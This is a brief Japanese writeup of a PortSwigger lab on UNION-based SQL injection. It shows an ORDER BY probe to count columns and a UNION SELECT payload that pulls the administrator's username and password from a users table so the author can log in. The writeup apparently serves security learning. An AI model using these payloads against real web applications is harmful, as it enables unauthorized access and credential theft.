はじめに

「SQL injection UNION attack, retrieving data from other tables」のWriteupです。

portswigger.net

Summary

• UNION SELECT を使って、別のテーブルの情報を読み出す
• 列数、型の辻褄を合わせなければならないことに留意

Writeup

目的は、usersテーブルにあるusername=administratorのpasswordを取得してログインすることです。

列数の確認です。 '+ORDER+BY+3--+ でエラーが発生したので2列です。

型の確認をしませんでしたが…以下でusernameとpasswordがレスポンスされました。

'+UNION+SELECT+username,password+FROM+users+WHERE+username='administrator'--+

administratorとしてログインできました。